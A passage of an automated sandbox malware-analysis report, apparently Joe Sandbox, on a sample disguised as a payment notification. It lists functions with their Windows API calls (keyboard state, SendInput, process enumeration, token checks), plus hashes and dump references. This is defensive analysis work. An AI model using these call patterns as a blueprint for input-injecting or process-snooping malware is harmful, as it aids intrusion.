GetKeyboardState.USER32(?,75A4C0D0,?,00008000), ref: 0099ABF1
SetKeyboardState.USER32(00000080,?,00008000), ref: 0099AC0D
PostMessageW.USER32(00000000,00000101,00000000), ref: 0099AC74
SendInput.USER32(00000001,?,0000001C,75A4C0D0,?,00008000), ref: 0099ACC6

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: KeyboardState$InputMessagePostSend
String ID:
API String ID: 432972143-0
Opcode ID: 96e1a5c55e6bee39124d6b0903002c3df5f9c355ed6c35dccc81c68930c464ef
Instruction ID: f2e20a4575be60d3ff5c499a79073fbe6d1405d4d95b77090f0d053125ced3e3
Opcode Fuzzy Hash: 96e1a5c55e6bee39124d6b0903002c3df5f9c355ed6c35dccc81c68930c464ef
Instruction Fuzzy Hash: 0E311270A04218AFEF248B6D8C04BFA7BA9EB89311F04461AE4C59A1D0E379898197D2

Function 009C7674 Relevance: 6.1, APIs: 4, Instructions: 102windowCOMMON

Download Yara Rule

APIs

ClientToScreen.USER32(?,?), ref: 009C769A
GetWindowRect.USER32(?,?), ref: 009C7710
PtInRect.USER32(?,?,009C8B89), ref: 009C7720
MessageBeep.USER32(00000000), ref: 009C778C

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Rect$BeepClientMessageScreenWindow
String ID:
API String ID: 1352109105-0
Opcode ID: f9341bd66e846a44cc306a349156f0d9be4a8d9de606f62d9e74edc25a68018d
Instruction ID: 992c8039ef9c36c0284cdbcb7b9b041ec7462a971eead0fd2a0a70f5eca04eba
Opcode Fuzzy Hash: f9341bd66e846a44cc306a349156f0d9be4a8d9de606f62d9e74edc25a68018d
Instruction Fuzzy Hash: 55417A34E092199FCB01CFA8C894FA9BBF9BB49354F1940ACE8149B261C730A942CF91

Function 009C16DA Relevance: 6.1, APIs: 4, Instructions: 101COMMON

Download Yara Rule

APIs

GetForegroundWindow.USER32 ref: 009C16EB

Part of subcall function 00993A3D: GetWindowThreadProcessId.USER32(?,00000000), ref: 00993A57
Part of subcall function 00993A3D: GetCurrentThreadId.KERNEL32 ref: 00993A5E
Part of subcall function 00993A3D: AttachThreadInput.USER32(00000000,?,00000000,00000000,?,009925B3), ref: 00993A65

GetCaretPos.USER32(?), ref: 009C16FF
ClientToScreen.USER32(00000000,?), ref: 009C174C
GetForegroundWindow.USER32 ref: 009C1752

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: ThreadWindow$Foreground$AttachCaretClientCurrentInputProcessScreen
String ID:
API String ID: 2759813231-0
Opcode ID: 0704dd2cae86bfcc6c488b65f6b2939c1788085e866aaa23c86b737e458eb842
Instruction ID: 325e7f6f008a316953f74136bc1ca3b17e6e64fc65260c3e4afb54e882ed6e23
Opcode Fuzzy Hash: 0704dd2cae86bfcc6c488b65f6b2939c1788085e866aaa23c86b737e458eb842
Instruction Fuzzy Hash: 96313EB5D04149AFCB04EFA9C881DAEBBFDEF89304B5080A9E415E7212D6319E45CFA1

Function 0099D4DC Relevance: 6.1, APIs: 4, Instructions: 86processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 0099D501
Process32FirstW.KERNEL32(00000000,?), ref: 0099D50F
Process32NextW.KERNEL32(00000000,?), ref: 0099D52F
CloseHandle.KERNEL32(00000000), ref: 0099D5DC

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Process32$CloseCreateFirstHandleNextSnapshotToolhelp32
String ID:
API String ID: 420147892-0
Opcode ID: 7071ce087d065709927cefee51015a436afddb42038e899b4bc52b113d230354
Instruction ID: bf215d67f2a2a33289b61d49401e18ded50b03030c06668e1c977b4fc5e138f0
Opcode Fuzzy Hash: 7071ce087d065709927cefee51015a436afddb42038e899b4bc52b113d230354
Instruction Fuzzy Hash: BB318D711083009FD700EF64C881BAFBBE8EFD9354F14092DF585861A1EB71A949CB93

Function 009C8FC9 Relevance: 6.1, APIs: 4, Instructions: 78windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

GetCursorPos.USER32(?), ref: 009C9001
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,00987711,?,?,?,?,?), ref: 009C9016
GetCursorPos.USER32(?), ref: 009C905E
DefDlgProcW.USER32(?,0000007B,?,?,?,?,?,?,?,?,?,?,00987711,?,?,?), ref: 009C9094

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Cursor$LongMenuPopupProcTrackWindow
String ID:
API String ID: 2864067406-0
Opcode ID: 18435bd3650913547e05618c303cf6fd77dfad7dbad3e2aaea58f5a793c6e52f
Instruction ID: 9a18372fdcd5671196293891ac44d4f08a3b9cd027d1a900f36dad872f2ed19a
Opcode Fuzzy Hash: 18435bd3650913547e05618c303cf6fd77dfad7dbad3e2aaea58f5a793c6e52f
Instruction Fuzzy Hash: BD21A135A01018EFCB25CF94CC58FFA7BB9EF89350F044059F90547261C3359991EB61

Function 0099D2C1 Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,009CCB68), ref: 0099D2FB
GetLastError.KERNEL32 ref: 0099D30A
CreateDirectoryW.KERNEL32(?,00000000), ref: 0099D319
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,009CCB68), ref: 0099D376

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: edcea0d21777bfb9657667a9fb9dc6c42ec1cec22fad39db405487f724071745
Instruction ID: b853814cfde0c921004812d41f973a5b3d99c28a0c37f91c23e2d235364ada1c
Opcode Fuzzy Hash: edcea0d21777bfb9657667a9fb9dc6c42ec1cec22fad39db405487f724071745
Instruction Fuzzy Hash: 1F218670509201DF8B10DF68C88296E7BE8EF96369F504A1DF499C72A1D731DD45CB93

Function 00991571 Relevance: 6.1, APIs: 4, Instructions: 78memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 00991014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 0099102A
Part of subcall function 00991014: GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00991036
Part of subcall function 00991014: GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00991045
Part of subcall function 00991014: HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 0099104C
Part of subcall function 00991014: GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00991062

LookupPrivilegeValueW.ADVAPI32(00000000,?,?), ref: 009915BE
_memcmp.LIBVCRUNTIME ref: 009915E1
GetProcessHeap.KERNEL32(00000000,00000000), ref: 00991617
HeapFree.KERNEL32(00000000), ref: 0099161E

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Heap$InformationProcessToken$AllocErrorFreeLastLookupPrivilegeValue_memcmp
String ID:
API String ID: 1592001646-0
Opcode ID: 766476283ffdc5a15ffde81e667a6ad40baac7551c7a6d6f7b19a83c8692e193
Instruction ID: 3ce6f2cc1f7b8b184171de16af48f49dba1ceb2aa6968bdd06791981cc220da7
Opcode Fuzzy Hash: 766476283ffdc5a15ffde81e667a6ad40baac7551c7a6d6f7b19a83c8692e193
Instruction Fuzzy Hash: 1E219A72E4410AEFDF04DFA9C945BEEB7B8FF84344F094459E445AB241E730AA45DBA0

Function 009C2782 Relevance: 6.1, APIs: 4, Instructions: 75COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EC), ref: 009C280A
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009C2824
SetWindowLongW.USER32(?,000000EC,00000000), ref: 009C2832
SetLayeredWindowAttributes.USER32(?,00000000,?,00000002), ref: 009C2840

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Long$AttributesLayered
String ID:
API String ID: 2169480361-0
Opcode ID: 4db2409e837ed8dd810c78cc486c8718aa011bc0efe357413dee37006818df6b
Instruction ID: 3d20828a903170179a142ffff568efe4999c6ff5c737746a4674a605596ef8d3
Opcode Fuzzy Hash: 4db2409e837ed8dd810c78cc486c8718aa011bc0efe357413dee37006818df6b
Instruction Fuzzy Hash: 5921D331A08611AFD714DB24C884FAA7B99AF85324F14815CF42ACB6E2CB75FC42CB91

Function 009978F5 Relevance: 6.1, APIs: 3, Strings: 1, Instructions: 71stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00998D7D: lstrlenW.KERNEL32(?,00000002,000000FF,?,?,?,0099790A,?,000000FF,?,00998754,00000000,?,0000001C,?,?), ref: 00998D8C
Part of subcall function 00998D7D: lstrcpyW.KERNEL32(00000000,?,?,0099790A,?,000000FF,?,00998754,00000000,?,0000001C,?,?,00000000), ref: 00998DB2
Part of subcall function 00998D7D: lstrcmpiW.KERNEL32(00000000,?,0099790A,?,000000FF,?,00998754,00000000,?,0000001C,?,?), ref: 00998DE3

lstrlenW.KERNEL32(?,00000002,000000FF,?,000000FF,?,00998754,00000000,?,0000001C,?,?,00000000), ref: 00997923
lstrcpyW.KERNEL32(00000000,?,?,00998754,00000000,?,0000001C,?,?,00000000), ref: 00997949
lstrcmpiW.KERNEL32(00000002,cdecl,?,00998754,00000000,?,0000001C,?,?,00000000), ref: 00997984

Strings

cdecl, xrefs: 0099797B

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: lstrcmpilstrcpylstrlen
String ID: cdecl
API String ID: 4031866154-3896280584
Opcode ID: 4bb8a9f02722d7e748d57b1d1231d0e8782b3a1fba12bab8575a2b1fc7d7ae7f
Instruction ID: dd6c2e449bd39443ef5138e44c66012c3f492fc6ef3f15045d80ec428f219bc7
Opcode Fuzzy Hash: 4bb8a9f02722d7e748d57b1d1231d0e8782b3a1fba12bab8575a2b1fc7d7ae7f
Instruction Fuzzy Hash: 6D11227A214302AFCF159F79D844E7BB7A9FF85390B10402AF906CB2A4EF319801D7A1

Function 009C7CC2 Relevance: 6.1, APIs: 4, Instructions: 70COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000F0), ref: 009C7D0B
SetWindowLongW.USER32(00000000,000000F0,?), ref: 009C7D2A
SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 009C7D42
SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,?,?,?,?,?,?,?,?,009AB7AD,00000000), ref: 009C7D6B

Part of subcall function 00949BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00949BB2

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 067f03913983a3d6b97e4e24b565c7fbca3ecb8535049d1792f79e56254d14b1
Instruction ID: 4cb69dfbcc262d91ee3646861e586cd199def53506fa1fa6fdf470703f6fa88f
Opcode Fuzzy Hash: 067f03913983a3d6b97e4e24b565c7fbca3ecb8535049d1792f79e56254d14b1
Instruction Fuzzy Hash: 7F11A271918615AFCB109FA8DC04FA67BA9AF453A0F154728F83AC72F0D7309951DF50

Function 009C5660 Relevance: 6.1, APIs: 4, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,00001060,?,00000004), ref: 009C56BB
_wcslen.LIBCMT ref: 009C56CD
_wcslen.LIBCMT ref: 009C56D8
SendMessageW.USER32(?,00001002,00000000,?), ref: 009C5816

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend_wcslen
String ID:
API String ID: 455545452-0
Opcode ID: 34e4236d14c214369fd424f9fd637cc4e65b56e019360d31ff4b78e8f3678c98
Instruction ID: b0cdf48eb6eda26bf6453d654a1cf85782b564ba4251a07dcbc87acc09274aff
Opcode Fuzzy Hash: 34e4236d14c214369fd424f9fd637cc4e65b56e019360d31ff4b78e8f3678c98
Instruction Fuzzy Hash: BE11E171E00608A6DF20DFA2CD85FEE77ACAF10764B50446EF905D6081E774AAC4CB62

Function 00991A27 Relevance: 6.1, APIs: 4, Instructions: 56windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00991A47
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00991A59
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00991A6F
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00991A8A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 68be01c31ecaf91efdd1a0ee585698464587721b50ed721ae9462e6f660031dc
Instruction ID: d7968ab9dc11b617c5cb485459d89e31d90c299e96e6f0f475b397205b9088d3
Opcode Fuzzy Hash: 68be01c31ecaf91efdd1a0ee585698464587721b50ed721ae9462e6f660031dc
Instruction Fuzzy Hash: 8F11FA7AD01219FFEF119BA9C985FADBB78FB04750F200091E604B7290D6716E50DB94

Function 0099E1D6 Relevance: 6.1, APIs: 4, Instructions: 55synchronizationthreadwindowCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 0099E1FD
MessageBoxW.USER32(?,?,?,?), ref: 0099E230
WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0099E246
CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0099E24D

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CloseCurrentHandleMessageObjectSingleThreadWait
String ID:
API String ID: 2880819207-0
Opcode ID: 1d53300cefa9098994236b147a163bb52646042d005e32a619bf0454b3d26e74
Instruction ID: c31b62e576eff8c11f04f048d41f5e2ee8a697ac99f331c066e522e89c29c262
Opcode Fuzzy Hash: 1d53300cefa9098994236b147a163bb52646042d005e32a619bf0454b3d26e74
Instruction Fuzzy Hash: B111C8B6D08258BBCB01DBEC9C05EDE7FACEB45710F144255F924E7291D670890587A1

Function 0095D1CC Relevance: 6.1, APIs: 4, Instructions: 55threadCOMMON

Download Yara Rule

APIs

CreateThread.KERNEL32(00000000,?,0095CFF9,00000000,00000004,00000000), ref: 0095D218
GetLastError.KERNEL32 ref: 0095D224
__dosmaperr.LIBCMT ref: 0095D22B
ResumeThread.KERNEL32(00000000), ref: 0095D249

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Thread$CreateErrorLastResume__dosmaperr
String ID:
API String ID: 173952441-0
Opcode ID: 351d7955bae14a2606e266ebc981f4f4dbb67a76f668c758178fd5212bc45134
Instruction ID: 8cfc7eab2f2a90128c8cae938c1cf8aff503eaa203efecf7cfa9d4970924935b
Opcode Fuzzy Hash: 351d7955bae14a2606e266ebc981f4f4dbb67a76f668c758178fd5212bc45134
Instruction Fuzzy Hash: 8501D27680A204BBCB219BA7DC09BAE7E6DDFC1332F100219FD35961D0DB718909D7A0

Function 0093600E Relevance: 6.1, APIs: 4, Instructions: 53windowCOMMON

Download Yara Rule

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 0093604C
GetStockObject.GDI32(00000011), ref: 00936060
SendMessageW.USER32(00000000,00000030,00000000), ref: 0093606A

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: CreateMessageObjectSendStockWindow
String ID:
API String ID: 3970641297-0
Opcode ID: 898191c891dfc1f1c11bd8daa5a4a33c5368cd72282281f405d13266380a5a22
Instruction ID: 7b3ae6e62e327ba2259278d49599d480d89cf3aa7b9d0a6ecf3860e122ba784c
Opcode Fuzzy Hash: 898191c891dfc1f1c11bd8daa5a4a33c5368cd72282281f405d13266380a5a22
Instruction Fuzzy Hash: 35116DB2506509BFEF168FA59C45EEABF6DEF093A4F044215FA1852110D736DC60EFA0

Function 00953B3C Relevance: 6.1, APIs: 4, Instructions: 53COMMONLIBRARYCODE

Download Yara Rule

APIs

___BuildCatchObject.LIBVCRUNTIME ref: 00953B56

Part of subcall function 00953AA3: BuildCatchObjectHelperInternal.LIBVCRUNTIME ref: 00953AD2
Part of subcall function 00953AA3: ___AdjustPointer.LIBCMT ref: 00953AED

_UnwindNestedFrames.LIBCMT ref: 00953B6B
__FrameHandler3::FrameUnwindToState.LIBVCRUNTIME ref: 00953B7C
CallCatchBlock.LIBVCRUNTIME ref: 00953BA4

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_930000_Payment Notification Confirmation 010_01_2025.jbxd

Similarity

API ID: Catch$BuildFrameObjectUnwind$AdjustBlockCallFramesHandler3::HelperInternalNestedPointerState
String ID:
API String ID: 737400349-0
Opcode ID: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction ID: 4a22efc7ca4d54fac952fc4dfdf49e38e3c093de7606a7b64a0b482fed43b10c
Opcode Fuzzy Hash: 12ea49abee573113f57dbd3ec3a577afcc9c348439d29e6cbe32e78011ac24d3
Instruction Fuzzy Hash: 5D014C32100148BBDF129E96CC42EEB3F6DEF88799F048014FE48A6121C732E965DBA0

Function 00963073 Relevance: 6.1, APIs: 4, Instructions: 52libraryCOMMONLIBRARYCODE

Download Yara Rule

APIs

LoadLibraryExW.KERNEL32(00000000,00000000,00000800,009313C6,00000000,00000000,?,0096301A,009313C6,00000000,00000000,00000000,?,0096328B,00000006,FlsSetValue), ref: 009630A5
GetLastError.KERNEL32(?,0096301A,009313C6,00000000,00000000,00000000,?,0096328B,00000006,FlsSetValue,009D2290,FlsSetValue,00000000,00000364,?,00962E46), ref: 009630B1
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0096301A,009313C6,00000000,00000000,00000000,?,0096328B,00000006,FlsSetValue,009D2290,FlsSetValue,00000000), ref: 009630BF

Memory Dump Source

Source File: 00000000.00000002.1319441131.0000000000931000.00000020.00000001.01000000.00000003.sdmp, Offset: 00930000, based on PE: true

Associated: 00000000.00000002.1319421141.0000000000930000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009CC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319513809.00000000009F2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319587735.00000000009FC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1319609733.0000000000A04000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

